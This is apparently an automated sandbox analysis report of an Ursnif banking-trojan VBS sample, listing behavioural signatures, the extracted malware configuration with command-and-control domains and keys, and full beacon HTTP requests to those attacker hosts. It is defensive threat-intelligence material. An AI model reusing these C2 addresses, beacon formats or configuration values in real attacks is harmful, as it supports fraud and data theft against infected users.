Windows Analysis Report presentation[2021.09.09_15-26].vbs

Overview

General Information

Sample Name: presentation[2021.09.09_15-26].vbs
Analysis ID: 482024
MD5: 783f03c1b5f346544c131ea2b164e54d
SHA1: 9100e6d4ce0edfcb161552fdf2721835f12470a2
SHA256: 683fbb9eb6fd6a0a2bab8471d1be28bd45f0598e1db19dc3f6d7536f1c4b5e8b
Most interesting Screenshot:

Detection

Ursnif
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)
VBScript performs obfuscated calls to suspicious functions
Yara detected Ursnif
System process connects to network (likely due to code injection or exploit)
Antivirus detection for URL or domain
Found malware configuration
Sigma detected: Powershell run code from registry
Benign windows process drops PE files
Sigma detected: Encoded IEX
Multi AV Scanner detection for dropped file
Hooks registry keys query functions (used to hide registry keys)
Maps a DLL or memory area into another process
Compiles code for process injection (via .Net compiler)
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Creates processes via WMI
Allocates memory in foreign processes
Sigma detected: MSHTA Spawning Windows Shell
Deletes itself after installation
Creates a thread in another existing process (thread injection)
Modifies the export address table of user mode modules (user mode EAT hooks)
Writes registry values via WMI
Writes to foreign memory regions
Suspicious powershell command line found
Modifies the prolog of user mode functions (user mode inline hooks)
Injects code into the Windows Explorer (explorer.exe)
Modifies the context of a thread in another process (thread injection)
Sigma detected: Mshta Spawning Windows Shell
Sigma detected: Suspicious Csc.exe Source File Folder
Modifies the import address table of user mode modules (user mode IAT hooks)
Contains functionality to query locales information (e.g. system language)
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
May sleep (evasive loops) to hinder dynamic analysis
Uses code obfuscation techniques (call, push, ret)
Found evasive API chain (date check)
Queries the installation date of Windows
Detected potential crypto function
Contains functionality to launch a process as a different user
Sample execution stops while process was sleeping (likely an evasion)
Contains functionality to dynamically determine API calls
Contains long sleeps (>= 3 min)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Drops files with a non-matching file extension (content does not match file extension)
Java / VBScript file with very long strings (likely obfuscated code)
Searches for the Microsoft Outlook file path
Drops PE files
Uses a known web browser user agent for HTTP communication
Launches processes in debugging mode, may be used to hinder debugging
Compiles C# or VB.Net code
Dropped file seen in connection with other malware
Creates a process in suspended mode (likely to inject code)
Queries sensitive Operating System Information (via WMI, Win32_ComputerSystem, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Internet Provider seen in connection with other malware
Stores large binary data to the registry
Contains functionality to query CPU information (cpuid)
Contains functionality to call native functions
Found dropped PE file which has not been started or loaded
Enables debug privileges
AV process strings found (often used to terminate AV products)
PE file does not import any functions
Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
Uses Microsoft's Enhanced Cryptographic Provider
Found WSH timer for Javascript or VBS script (likely evasive script)

Classification

AV Detection:

Antivirus detection for URL or domain
Source: http://atl.bigbigpoppa.com/_2Bd0AwZG9XFE1JsQD/cYUPvk3qo/ww4_2FJnUCtl_2FACzcA/gxGADMlKA5cRRoa6VfN/bztGPiRkqBO_2FeJB_2BBD/IZBC0D711zpQe/9l1y4Uwd/xWWDr7ndPnPsd3SHIlHFSP9/fiR_2F5_2B/KN2_2B_2B5ItX8nNz/A90VzmqpXUKU/D_2BBXI_2Fv/Sm1xwqkwGWKzxN/PYriFQN1XTg1Mt_2Fdo2G/CZqhw6Gkw9Ga7J6_/2Bpy6_2BqUSt_2F/vDyCdPXYj3I1xnWURR/qEzCiHG74/IyTcmp76Fgjy6Le_2BYj/rD_2FzgWNQQxd_2BIyQ/7fmZMqR3a8eHDmZNS7_2Fe/dWNBCQOVIE_2F/6naTDq9tL/Nw Avira URL Cloud: Label: malware
Source: http://atl.bigbigpoppa.com/ls0YKrv_/2BJV6E5mlJLydgYjyupmqAO/ebshbxfLmK/53ueumhRK5uHsu1wq/kpnvHeT3BjeE/FCqvgS3hqwT/mPkNYDb32X1Qkc/N7G1r4IU6bUFNgu5BVVbX/yjbVABqaYeB8_2B_/2Fc9vKfZ4hMWLC_/2F14B5QvoOUabGWCw8/plYcnGyms/aXOFWp0J_2FK_2F8o_2B/CI_2FWn_2BX374n3ww4/TG_2ByfgHphR5COejTHsMy/gz3rKYS9XKGwv/EDh6_2Fg/2ikTmUt7QTCri3TRpRtQJWb/r2fO6KX7SN/6mXIe2jQ1oyEIqRjM/CLsIWaugZB_2/FhqkmGlAeUa/nn8rVI84Q/hCoKY5 Avira URL Cloud: Label: malware
Source: http://atl.bigbigpoppa.com/fLZmMbWHBrDjVjdoP/PBIC_2FBgMAC/GLBRSVYh_2B/gOgSU0YMdVq_2B/zcwHoIWkheDXq9xczsBhd/ElAduBsByQvdzYtm/u1rHkcLjXfXx1mz/65IOgBlAGjO7Q3M6vt/veJ56XC29/VYs86CKFiCgfUKe_2BfC/Owi_2FUGONT8UvwdsM8/JqV4Jr0011ZtMPmdvDnIrg/UTgh1kCejVnav/Uy_2FGvp/eeZw5tLTiHgf8fP7rzbZynm/BFygaGjj9P/SHhlv5Dn_2B4k8NOM/1M_2FM_2BW8G/dlVQieXVKAn/Zjy1O5qAJEGMC1/sQMiemHb82h85qSPQL4KI/K6v7yXzTOl7hZz/W Avira URL Cloud: Label: malware
Found malware configuration
Source: 00000015.00000003.1057194752.0000000004AB0000.00000040.00000001.sdmp Malware Configuration Extractor: Ursnif {"lang_id": "RU, CN", "RSA Public Key": "IAodzSkRRXZVbpA8JuABjuUBQvpHiTpdg9dOAQp7bBw4t0xkkPvGywDaeciS3HngU/RkNYsOricM2S0LVvdwWlSJ6FdKpFt6YFFWOrsBfCiNFCtU5v/Ohii1LI6H4/OB/132O4comC2he+ED1d47BeoZGdamjIEdPypU4ReJbSLrCxcRMW03mJzNzM22WWjes9V+fVfZ8lvnVONnlm+2SejHIEhpJMv4VzqUiuRgWDBCh1ovNzO3eDJUiuSU1jFcdmg2ywuZOyDLXh6uuRZonMVTxMoziZw6y80jGvuwDFFQy5TMx6xbKoXdqNSwE60TugFay/vbpOuG0fp4zORCVEe39fTGD2o0Gttx0E5BI4w=", "c2_domain": ["atl.bigbigpoppa.com", "pop.urlovedstuff.com"], "botnet": "2500", "server": "580", "serpent_key": "Do9L8DmcVMtyFi6j", "sleep_time": "5", "CONF_TIMEOUT": "20", "SetWaitableTimer_value": "1"}
Multi AV Scanner detection for dropped file
Source: C:\Users\user\AppData\Local\Temp\fum.cpp ReversingLabs: Detection: 55%

Cryptography:

Uses Microsoft's Enhanced Cryptographic Provider
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 21_2_04BC3276 CryptAcquireContextW,memcpy,CryptImportKey,CryptSetKeyParam,memcpy,CryptEncrypt,CryptDecrypt,GetLastError,GetLastError,CryptDestroyKey,GetLastError,CryptReleaseContext,GetLastError, 21_2_04BC3276
Source: Binary string: 7C:\Users\user\AppData\Local\Temp\tjafqng0\tjafqng0.pdbXP source: powershell.exe, 00000019.00000002.1238512582.000001B6D7684000.00000004.00000001.sdmp
Source: Binary string: 7C:\Users\user\AppData\Local\Temp\qlsida3o\qlsida3o.pdbXP source: powershell.exe, 00000019.00000002.1238604024.000001B6D76F8000.00000004.00000001.sdmp
Source: Binary string: c:\Led-Flower\Spell\cotton_point\please.pdb source: wscript.exe, 00000000.00000003.1013379730.000001BA25DFD000.00000004.00000001.sdmp, rundll32.exe, 00000015.00000002.1193389238.000000006FBF4000.00000002.00020000.sdmp, fum.cpp.0.dr
Source: Binary string: 7C:\Users\user\AppData\Local\Temp\tjafqng0\tjafqng0.pdb source: powershell.exe, 00000019.00000002.1238512582.000001B6D7684000.00000004.00000001.sdmp
Source: Binary string: ntdll.pdb source: rundll32.exe, 00000015.00000003.1171105183.00000000063F0000.00000004.00000001.sdmp
Source: Binary string: ntdll.pdbUGP source: rundll32.exe, 00000015.00000003.1171105183.00000000063F0000.00000004.00000001.sdmp
Source: Binary string: 7C:\Users\user\AppData\Local\Temp\qlsida3o\qlsida3o.pdb source: powershell.exe, 00000019.00000002.1238512582.000001B6D7684000.00000004.00000001.sdmp
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 21_2_05E61802 wcscpy,wcscpy,GetLogicalDriveStringsW,GetLogicalDriveStringsW,RtlAllocateHeap,memset,GetLogicalDriveStringsW,WaitForSingleObject,GetDriveTypeW,lstrlenW,wcscpy,lstrlenW,HeapFree, 21_2_05E61802
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 21_2_05E51577 FindFirstFileW,lstrlenW,lstrlenW,lstrcpyW,lstrlenW,lstrcpyW,lstrcpyW,FindNextFileW,FindClose,FreeLibrary, 21_2_05E51577
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 21_2_05E414A0 wcscpy,lstrlenW,lstrlenW,lstrlenW,memset,FindFirstFileW,lstrlenW,lstrlenW,memset,wcscpy,PathFindFileNameW,RtlEnterCriticalSection,RtlLeaveCriticalSection,lstrlenW,FindNextFileW,WaitForSingleObject,FindClose,FindFirstFileW,lstrlenW,FindNextFileW,WaitForSingleObject,FindClose, 21_2_05E414A0
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 21_2_05E56E4E lstrlenW,FindFirstFileW,lstrlenW,RemoveDirectoryW,DeleteFileW,FindNextFileW,GetLastError, 21_2_05E56E4E

Networking:

Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)
Source: Traffic Snort IDS: 2033204 ET TROJAN Ursnif Variant CnC Beacon - URI Struct M2 (_2F) 192.168.2.4:49833 -> 188.127.235.42:80
Source: Traffic Snort IDS: 2033203 ET TROJAN Ursnif Variant CnC Beacon - URI Struct M1 (_2B) 192.168.2.4:49833 -> 188.127.235.42:80
Source: Traffic Snort IDS: 2033204 ET TROJAN Ursnif Variant CnC Beacon - URI Struct M2 (_2F) 192.168.2.4:49834 -> 188.127.235.42:80
Source: Traffic Snort IDS: 2033203 ET TROJAN Ursnif Variant CnC Beacon - URI Struct M1 (_2B) 192.168.2.4:49834 -> 188.127.235.42:80
Source: Traffic Snort IDS: 2033204 ET TROJAN Ursnif Variant CnC Beacon - URI Struct M2 (_2F) 192.168.2.4:49835 -> 188.127.235.42:80
Source: Traffic Snort IDS: 2033203 ET TROJAN Ursnif Variant CnC Beacon - URI Struct M1 (_2B) 192.168.2.4:49835 -> 188.127.235.42:80
Source: Traffic Snort IDS: 2033204 ET TROJAN Ursnif Variant CnC Beacon - URI Struct M2 (_2F) 192.168.2.4:49836 -> 188.127.235.42:80
Source: Traffic Snort IDS: 2033203 ET TROJAN Ursnif Variant CnC Beacon - URI Struct M1 (_2B) 192.168.2.4:49836 -> 188.127.235.42:80
System process connects to network (likely due to code injection or exploit)
Source: C:\Windows\SysWOW64\rundll32.exe Domain query: atl.bigbigpoppa.com
Source: C:\Windows\SysWOW64\rundll32.exe Network Connect: 188.127.235.42 80
Uses a known web browser user agent for HTTP communication
Source: global traffic HTTP traffic detected: GET /_2Bd0AwZG9XFE1JsQD/cYUPvk3qo/ww4_2FJnUCtl_2FACzcA/gxGADMlKA5cRRoa6VfN/bztGPiRkqBO_2FeJB_2BBD/IZBC0D711zpQe/9l1y4Uwd/xWWDr7ndPnPsd3SHIlHFSP9/fiR_2F5_2B/KN2_2B_2B5ItX8nNz/A90VzmqpXUKU/D_2BBXI_2Fv/Sm1xwqkwGWKzxN/PYriFQN1XTg1Mt_2Fdo2G/CZqhw6Gkw9Ga7J6_/2Bpy6_2BqUSt_2F/vDyCdPXYj3I1xnWURR/qEzCiHG74/IyTcmp76Fgjy6Le_2BYj/rD_2FzgWNQQxd_2BIyQ/7fmZMqR3a8eHDmZNS7_2Fe/dWNBCQOVIE_2F/6naTDq9tL/Nw HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheUser-Agent: Mozilla/5.0 (Windows NT 10.0; rv:90.0) Gecko/20100101 Firefox/90.0Host: atl.bigbigpoppa.com
Source: global traffic HTTP traffic detected: GET /ls0YKrv_/2BJV6E5mlJLydgYjyupmqAO/ebshbxfLmK/53ueumhRK5uHsu1wq/kpnvHeT3BjeE/FCqvgS3hqwT/mPkNYDb32X1Qkc/N7G1r4IU6bUFNgu5BVVbX/yjbVABqaYeB8_2B_/2Fc9vKfZ4hMWLC_/2F14B5QvoOUabGWCw8/plYcnGyms/aXOFWp0J_2FK_2F8o_2B/CI_2FWn_2BX374n3ww4/TG_2ByfgHphR5COejTHsMy/gz3rKYS9XKGwv/EDh6_2Fg/2ikTmUt7QTCri3TRpRtQJWb/r2fO6KX7SN/6mXIe2jQ1oyEIqRjM/CLsIWaugZB_2/FhqkmGlAeUa/nn8rVI84Q/hCoKY5 HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheUser-Agent: Mozilla/5.0 (Windows NT 10.0; rv:90.0) Gecko/20100101 Firefox/90.0Host: atl.bigbigpoppa.com
Source: global traffic HTTP traffic detected: GET /fLZmMbWHBrDjVjdoP/PBIC_2FBgMAC/GLBRSVYh_2B/gOgSU0YMdVq_2B/zcwHoIWkheDXq9xczsBhd/ElAduBsByQvdzYtm/u1rHkcLjXfXx1mz/65IOgBlAGjO7Q3M6vt/veJ56XC29/VYs86CKFiCgfUKe_2BfC/Owi_2FUGONT8UvwdsM8/JqV4Jr0011ZtMPmdvDnIrg/UTgh1kCejVnav/Uy_2FGvp/eeZw5tLTiHgf8fP7rzbZynm/BFygaGjj9P/SHhlv5Dn_2B4k8NOM/1M_2FM_2BW8G/dlVQieXVKAn/Zjy1O5qAJEGMC1/sQMiemHb82h85qSPQL4KI/K6v7yXzTOl7hZz/W HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheUser-Agent: Mozilla/5.0 (Windows NT 10.0; rv:90.0) Gecko/20100101 Firefox/90.0Host: atl.bigbigpoppa.com
Source: global traffic HTTP traffic detected: GET /J7vFZ3DnKfP9_2BLqsOzhE/_2B0sX39iqKXX/xRC3_2Bn/FR7I7tC4Y_2BKbKZhTipXKo/Y68Clp5syo/AKjqJkiRp4I9iXaE1/6hTqbwupKV0Z/G7JGvRt1lPU/_2FoM5FRPpNFQ7/Q0DKQKOrk_2B_2BMtgkLi/AHH7yDMmOl_2BC_2/Bw6mGTTnqH2yR_2/BWwJ_2BspWSt3ypb_2/B3jzGWYjP/wQws_2BBySwRC_2FSzoA/9eCjcMJ9yhEG_2BMBin/PBuDF_2BwHt7nPiirKF3ia/yI6rUSMPL1t1W/Tqi6oYDf/4qfPSjhH9hVkFRq5vohLKMn/uKsZDY_2Bm7_2FTYT00/CD HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:90.0) Gecko/20100101 Firefox/90.0Host: art.microsoftsofymicrosoftsoft.at
Source: global traffic HTTP traffic detected: POST /0QTFQ19LsLPPw2WV1xJ/YcBhtZLzUs6CSioSs9dLnb/aEb6zuvJhqdcs/1Hb1sg90/RWaFAF1NEpmrckuTWKaPqAA/24G0Hczqd6/RbhQoaSPqBLCdZu1n/MpE8YBnCkgqe/EyYs8PTQfhS/e3P4PnLK5TJvEZ/zj0oBbuVnCwlxQAQ_2FhY/0Zu1rFoV_2B4IBxL/S0k_2BzfYQGXk4l/RlIY9NCU_2Bq2C0qZR/XkIkWaJBq/tdpiFuEgu5qCEOsijppu/WtAIhPYjfYVFXMRTyYR/vZDnI_2BfmuNdCFB6L924B/9580GsWQ3CLj4/gdGO_2FS/6 HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:90.0) Gecko/20100101 Firefox/90.0Content-Length: 2Host: art.microsoftsofymicrosoftsoft.at
Internet Provider seen in connection with other malware
Source: Joe Sandbox View ASN Name: DHUBRU DHUBRU
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Mon, 13 Sep 2021 09:05:28 GMTContent-Type: text/html; charset=utf-8Content-Length: 146Connection: closeVary: Accept-EncodingData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>
Source: rundll32.exe, 00000015.00000003.1157748443.00000000062E8000.00000004.00000040.sdmp, control.exe, 00000020.00000003.1179024803.0000016F94C7C000.00000004.00000040.sdmp String found in binary or memory: http://constitution.org/usdeclar.txt
Source: rundll32.exe, 00000015.00000003.1157748443.00000000062E8000.00000004.00000040.sdmp, control.exe, 00000020.00000003.1179024803.0000016F94C7C000.00000004.00000040.sdmp String found in binary or memory: http://constitution.org/usdeclar.txtC:
Source: powershell.exe, 00000019.00000003.1134490051.000001B6EB600000.00000004.00000001.sdmp String found in binary or memory: http://crl.m-
Source: rundll32.exe, 00000015.00000003.1157748443.00000000062E8000.00000004.00000040.sdmp, control.exe, 00000020.00000003.1179024803.0000016F94C7C000.00000004.00000040.sdmp String found in binary or memory: http://https://file://USER.ID%lu.exe/upd
Source: powershell.exe, 00000019.00000002.1238922914.000001B6E2E3E000.00000004.00000001.sdmp String found in binary or memory: http://nuget.org/NuGet.exe
Source: powershell.exe, 00000019.00000002.1218191290.000001B6D2FF0000.00000004.00000001.sdmp String found in binary or memory: http://pesterbdd.com/images/Pester.png
Source: powershell.exe, 00000019.00000002.1216995781.000001B6D2DE1000.00000004.00000001.sdmp String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: powershell.exe, 00000019.00000002.1218191290.000001B6D2FF0000.00000004.00000001.sdmp String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
Source: powershell.exe, 00000019.00000002.1238922914.000001B6E2E3E000.00000004.00000001.sdmp String found in binary or memory: https://contoso.com/
Source: powershell.exe, 00000019.00000002.1238922914.000001B6E2E3E000.00000004.00000001.sdmp String found in binary or memory: https://contoso.com/Icon
Source: powershell.exe, 00000019.00000002.1238922914.000001B6E2E3E000.00000004.00000001.sdmp String found in binary or memory: https://contoso.com/License
Source: powershell.exe, 00000019.00000002.1218191290.000001B6D2FF0000.00000004.00000001.sdmp String found in binary or memory: https://github.com/Pester/Pester
Source: powershell.exe, 00000019.00000002.1238922914.000001B6E2E3E000.00000004.00000001.sdmp String found in binary or memory: https://nuget.org/nuget.exe
Source: unknown DNS traffic detected: queries for: atl.bigbigpoppa.com
Source: global traffic HTTP traffic detected: GET /_2Bd0AwZG9XFE1JsQD/cYUPvk3qo/ww4_2FJnUCtl_2FACzcA/gxGADMlKA5cRRoa6VfN/bztGPiRkqBO_2FeJB_2BBD/IZBC0D711zpQe/9l1y4Uwd/xWWDr7ndPnPsd3SHIlHFSP9/fiR_2F5_2B/KN2_2B_2B5ItX8nNz/A90VzmqpXUKU/D_2BBXI_2Fv/Sm1xwqkwGWKzxN/PYriFQN1XTg1Mt_2Fdo2G/CZqhw6Gkw9Ga7J6_/2Bpy6_2BqUSt_2F/vDyCdPXYj3I1xnWURR/qEzCiHG74/IyTcmp76Fgjy6Le_2BYj/rD_2FzgWNQQxd_2BIyQ/7fmZMqR3a8eHDmZNS7_2Fe/dWNBCQOVIE_2F/6naTDq9tL/Nw HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheUser-Agent: Mozilla/5.0 (Windows NT 10.0; rv:90.0) Gecko/20100101 Firefox/90.0Host: atl.bigbigpoppa.com
Source: global traffic HTTP traffic detected: GET /ls0YKrv_/2BJV6E5mlJLydgYjyupmqAO/ebshbxfLmK/53ueumhRK5uHsu1wq/kpnvHeT3BjeE/FCqvgS3hqwT/mPkNYDb32X1Qkc/N7G1r4IU6bUFNgu5BVVbX/yjbVABqaYeB8_2B_/2Fc9vKfZ4hMWLC_/2F14B5QvoOUabGWCw8/plYcnGyms/aXOFWp0J_2FK_2F8o_2B/CI_2FWn_2BX374n3ww4/TG_2ByfgHphR5COejTHsMy/gz3rKYS9XKGwv/EDh6_2Fg/2ikTmUt7QTCri3TRpRtQJWb/r2fO6KX7SN/6mXIe2jQ1oyEIqRjM/CLsIWaugZB_2/FhqkmGlAeUa/nn8rVI84Q/hCoKY5 HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheUser-Agent: Mozilla/5.0 (Windows NT 10.0; rv:90.0) Gecko/20100101 Firefox/90.0Host: atl.bigbigpoppa.com
Source: global traffic HTTP traffic detected: GET /fLZmMbWHBrDjVjdoP/PBIC_2FBgMAC/GLBRSVYh_2B/gOgSU0YMdVq_2B/zcwHoIWkheDXq9xczsBhd/ElAduBsByQvdzYtm/u1rHkcLjXfXx1mz/65IOgBlAGjO7Q3M6vt/veJ56XC29/VYs86CKFiCgfUKe_2BfC/Owi_2FUGONT8UvwdsM8/JqV4Jr0011ZtMPmdvDnIrg/UTgh1kCejVnav/Uy_2FGvp/eeZw5tLTiHgf8fP7rzbZynm/BFygaGjj9P/SHhlv5Dn_2B4k8NOM/1M_2FM_2BW8G/dlVQieXVKAn/Zjy1O5qAJEGMC1/sQMiemHb82h85qSPQL4KI/K6v7yXzTOl7hZz/W HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheUser-Agent: Mozilla/5.0 (Windows NT 10.0; rv:90.0) Gecko/20100101 Firefox/90.0Host: atl.bigbigpoppa.com
Source: global traffic HTTP traffic detected: GET /J7vFZ3DnKfP9_2BLqsOzhE/_2B0sX39iqKXX/xRC3_2Bn/FR7I7tC4Y_2BKbKZhTipXKo/Y68Clp5syo/AKjqJkiRp4I9iXaE1/6hTqbwupKV0Z/G7JGvRt1lPU/_2FoM5FRPpNFQ7/Q0DKQKOrk_2B_2BMtgkLi/AHH7yDMmOl_2BC_2/Bw6mGTTnqH2yR_2/BWwJ_2BspWSt3ypb_2/B3jzGWYjP/wQws_2BBySwRC_2FSzoA/9eCjcMJ9yhEG_2BMBin/PBuDF_2BwHt7nPiirKF3ia/yI6rUSMPL1t1W/Tqi6oYDf/4qfPSjhH9hVkFRq5vohLKMn/uKsZDY_2Bm7_2FTYT00/CD HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:90.0) Gecko/20100101 Firefox/90.0Host: art.microsoftsofymicrosoftsoft.at
Source: unknown HTTP traffic detected: POST /0QTFQ19LsLPPw2WV1xJ/YcBhtZLzUs6CSioSs9dLnb/aEb6zuvJhqdcs/1Hb1sg90/RWaFAF1NEpmrckuTWKaPqAA/24G0Hczqd6/RbhQoaSPqBLCdZu1n/MpE8YBnCkgqe/EyYs8PTQfhS/e3P4PnLK5TJvEZ/zj0oBbuVnCwlxQAQ_2FhY/0Zu1rFoV_2B4IBxL/S0k_2BzfYQGXk4l/RlIY9NCU_2Bq2C0qZR/XkIkWaJBq/tdpiFuEgu5qCEOsijppu/WtAIhPYjfYVFXMRTyYR/vZDnI_2BfmuNdCFB6L924B/9580GsWQ3CLj4/gdGO_2FS/6 HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:90.0) Gecko/20100101 Firefox/90.0Content-Length: 2Host: art.microsoftsofymicrosoftsoft.at

Key, Mouse, Clipboard, Microphone and Screen Capturing:

Yara detected Ursnif
Source: Yara match File source: 00000015.00000003.1100831932.0000000005888000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000020.00000003.1179024803.0000016F94C7C000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000015.00000003.1097126029.0000000005888000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000015.00000003.1097248260.0000000005888000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000015.00000003.1097156234.0000000005888000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000020.00000003.1178938192.0000016F94C7C000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000015.00000003.1097185977.0000000005888000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000015.00000003.1097225716.0000000005888000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000015.00000003.1097283225.0000000005888000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000020.00000002.1222209287.0000016F94C7C000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000020.00000003.1179057406.0000016F94C7C000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000020.00000003.1178835600.0000016F94C7C000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000015.00000003.1097297117.0000000005888000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000015.00000003.1157748443.00000000062E8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000015.00000003.1097267626.0000000005888000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000015.00000003.1105474660.000000000568C000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: rundll32.exe PID: 5552, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: control.exe PID: 4504, type: MEMORYSTR
Source: Yara match File source: 21.3.rundll32.exe.5838d48.2.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 21.3.rundll32.exe.578a4a0.1.unpack, type: UNPACKEDPE
Source: Yara match File source: 21.3.rundll32.exe.58094a0.3.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 21.3.rundll32.exe.578a4a0.1.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000020.00000000.1176959045.0000000000C90000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match File source: 00000020.00000000.1173339392.0000000000C90000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match File source: 00000015.00000003.1103640775.0000000005809000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000020.00000000.1175334626.0000000000C90000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match File source: 00000020.00000002.1221119443.0000000000C91000.00000020.00020000.sdmp, type: MEMORY
Source: Yara match File source: 00000015.00000002.1192551182.000000000550F000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000015.00000003.1103580587.000000000578A000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000019.00000002.1238922914.000001B6E2E3E000.00000004.00000001.sdmp, type: MEMORY

E-Banking Fraud:

Yara detected Ursnif
Source: Yara match File source: 00000015.00000003.1100831932.0000000005888000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000020.00000003.1179024803.0000016F94C7C000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000015.00000003.1097126029.0000000005888000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000015.00000003.1097248260.0000000005888000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000015.00000003.1097156234.0000000005888000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000020.00000003.1178938192.0000016F94C7C000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000015.00000003.1097185977.0000000005888000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000015.00000003.1097225716.0000000005888000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000015.00000003.1097283225.0000000005888000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000020.00000002.1222209287.0000016F94C7C000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000020.00000003.1179057406.0000016F94C7C000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000020.00000003.1178835600.0000016F94C7C000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000015.00000003.1097297117.0000000005888000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000015.00000003.1157748443.00000000062E8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000015.00000003.1097267626.0000000005888000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000015.00000003.1105474660.000000000568C000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: rundll32.exe PID: 5552, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: control.exe PID: 4504, type: MEMORYSTR
Source: Yara match File source: 21.3.rundll32.exe.5838d48.2.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 21.3.rundll32.exe.578a4a0.1.unpack, type: UNPACKEDPE
Source: Yara match File source: 21.3.rundll32.exe.58094a0.3.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 21.3.rundll32.exe.578a4a0.1.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000020.00000000.1176959045.0000000000C90000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match File source: 00000020.00000000.1173339392.0000000000C90000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match File source: 00000015.00000003.1103640775.0000000005809000.00000004.00000040.sdmp, type: MEMORY
